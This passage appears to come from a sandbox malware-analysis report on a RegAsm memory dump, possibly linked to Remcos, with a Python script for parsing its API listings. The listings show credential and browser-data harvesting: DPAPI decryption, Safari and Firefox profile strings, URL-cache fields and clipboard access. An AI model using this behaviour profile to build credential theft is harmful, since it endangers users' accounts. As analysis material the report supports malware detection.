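• Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
APIs
• RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
Memory Dump Source
• Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Open
• Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
"""

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by the subcall marker.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
    r"(?P<api>\S+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+): ?(?P<value>.*)$")   # "• Key: value"
PLACEHOLDER_RE = re.compile(r"[0-9A-F]{8}|\?")     # 32-bit immediates / unknown args

# Editor's own import-to-behaviour mapping (assumption, not a Joe Sandbox taxonomy).
BEHAVIOUR_TAGS = {
    "RegOpenKeyExW": "registry-read",
    "GetPrivateProfileIntW": "ini-settings",
    "WritePrivateProfileStringW": "ini-settings",
    "EnumResourceNamesW": "resource-enum",
    "FindClose": "directory-enum",
    "K32GetModuleFileNameExW": "process-inspection",
    "CreateFileW": "file-io", "ReadFile": "file-io", "WriteFile": "file-io",
    "FreeLibrary": "dynamic-loading",
}


def parse_entries(text):
    """Split the report text into entries; every entry ends with its
    'Instruction Fuzzy Hash' line, so a trailing half-entry is dropped."""
    entries, cur = [], None
    for line in text.splitlines():
        if cur is None:
            cur = {"apis": [], "fields": {}}
        m = API_RE.match(line)
        if m:
            call = m.groupdict()
            call["args"] = call["args"].split(",") if call["args"] else []
            cur["apis"].append(call)
            continue
        m = FIELD_RE.match(line)
        if m:
            key, value = m.group("key").strip(), m.group("value").strip()
            cur["fields"][key] = value
            if key == "Instruction Fuzzy Hash":
                entries.append(cur)
                cur = None
    return entries


def triage(entry):
    """Return (behaviour tags, literal string arguments) for one entry.
    Subcalls count towards the tags; literals are anything that is not a
    32-bit immediate or a '?' placeholder."""
    tags, literals = set(), []
    for call in entry["apis"]:
        tag = BEHAVIOUR_TAGS.get(call["api"])
        if tag:
            tags.add(tag)
        literals.extend(a for a in call["args"] if not PLACEHOLDER_RE.fullmatch(a))
    return sorted(tags), literals


def summarize(text):
    rows = []
    for entry in parse_entries(text):
        tags, literals = triage(entry)
        rows.append({
            "api_id": entry["fields"].get("API ID", ""),
            "refs": [c["ref"] for c in entry["apis"] if c["caller"] is None],
            "tags": tags,
            "strings": literals,
            "fuzzy": entry["fields"]["Instruction Fuzzy Hash"],
        })
    return rows


if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print(row["refs"], row["tags"], row["strings"])
```

Running it over the full report text instead of SAMPLE gives a per-function table you can sort by tag, which is how the Shell Folders lookup and the INI settings writer stand out from the file-I/O and CRT boilerplate; the instruction fuzzy hash column is what you would feed into a similarity search against earlier Remcos dumps.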
                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                APIs
                                                • memset.MSVCRT ref: 004095FC
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                • String ID:
                                                • API String ID: 3655998216-0
                                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                APIs
                                                • memset.MSVCRT ref: 00445426
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                • String ID:
                                                • API String ID: 1828521557-0
                                                APIs
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                Similarity
                                                • API ID: ??2@FilePointermemcpy
                                                • String ID:
                                                • API String ID: 609303285-0
                                                Similarity
                                                • API ID: _wcsicmp
                                                • String ID:
                                                • API String ID: 2081463915-0
                                                APIs
                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                Similarity
                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                • String ID:
                                                • API String ID: 2136311172-0
                                                APIs
                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                Similarity
                                                • API ID: ??2@??3@
                                                • String ID:
                                                • API String ID: 1936579350-0
                                                Similarity
                                                • API ID: free
                                                • String ID:
                                                • API String ID: 1294909896-0
                                                Similarity
                                                • API ID: free
                                                • String ID:
                                                • API String ID: 1294909896-0
                                                APIs
                                                • EmptyClipboard.USER32 ref: 00409882
                                                • wcslen.MSVCRT ref: 0040988F
                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                • CloseClipboard.USER32 ref: 004098D7
                                                Similarity
                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                • String ID:
                                                • API String ID: 1213725291-0
                                                APIs
                                                • GetLastError.KERNEL32 ref: 004182D7
                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                • free.MSVCRT ref: 00418370
                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                Similarity
                                                • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                • String ID: OsError 0x%x (%u)
                                                • API String ID: 2360000266-2664311388
                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                Similarity
                                                • API ID: Version
                                                • String ID:
                                                • API String ID: 1889659487-0
                                                APIs
                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                • _wcsicmp.MSVCRT ref: 00402305
                                                • _wcsicmp.MSVCRT ref: 00402333
                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                • memset.MSVCRT ref: 0040265F
                                                • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                Similarity
                                                • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                • API String ID: 2257402768-1134094380
                                                Similarity
                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                • String ID: :stringdata$ftp://$http://$https://
                                                • API String ID: 2787044678-1921111777
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                • GetDC.USER32 ref: 004140E3
                                                • wcslen.MSVCRT ref: 00414123
                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                • _snwprintf.MSVCRT ref: 00414244
                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                Similarity
                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                • String ID: %s:$EDIT$STATIC
                                                • API String ID: 2080319088-3046471546
                                                APIs
                                                • EndDialog.USER32(?,?), ref: 00413221
                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                • memset.MSVCRT ref: 00413292
                                                • memset.MSVCRT ref: 004132B4
                                                • memset.MSVCRT ref: 004132CD
                                                • memset.MSVCRT ref: 004132E1
                                                • memset.MSVCRT ref: 004132FB
                                                • memset.MSVCRT ref: 00413310
                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                • memset.MSVCRT ref: 004133C0
                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                • wcscpy.MSVCRT ref: 0041341F
                                                • _snwprintf.MSVCRT ref: 0041348E
                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                Strings
                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                • {Unknown}, xrefs: 004132A6
                                                Similarity
                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                • API String ID: 4111938811-1819279800
                                                APIs
                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                • SetCursor.USER32(00000000), ref: 0040129E
                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                Similarity
                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                • String ID:
                                                • API String ID: 829165378-0
                                                APIs
                                                • memset.MSVCRT ref: 00404172
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                • wcscpy.MSVCRT ref: 004041D6
                                                • wcscpy.MSVCRT ref: 004041E7
                                                • memset.MSVCRT ref: 00404200
                                                • memset.MSVCRT ref: 00404215
                                                • _snwprintf.MSVCRT ref: 0040422F
                                                • wcscpy.MSVCRT ref: 00404242
                                                • memset.MSVCRT ref: 0040426E
                                                • memset.MSVCRT ref: 004042CD
                                                • memset.MSVCRT ref: 004042E2
                                                • _snwprintf.MSVCRT ref: 004042FE
                                                • wcscpy.MSVCRT ref: 00404311
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                • API String ID: 2454223109-1580313836
                                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                APIs
                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                • API String ID: 4054529287-3175352466
                                                • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _snwprintf$memset$wcscpy
                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                • API String ID: 2000436516-3842416460
                                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                APIs
                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                • String ID:
                                                • API String ID: 1043902810-0
                                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                APIs
                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                • free.MSVCRT ref: 0040E49A
                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                • memset.MSVCRT ref: 0040E380
                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                • wcschr.MSVCRT ref: 0040E3B8
                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                • API String ID: 3849927982-2252543386
                                                • Opcode ID: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                • Opcode Fuzzy Hash: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                APIs
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                • _snwprintf.MSVCRT ref: 0044488A
                                                • wcscpy.MSVCRT ref: 004448B4
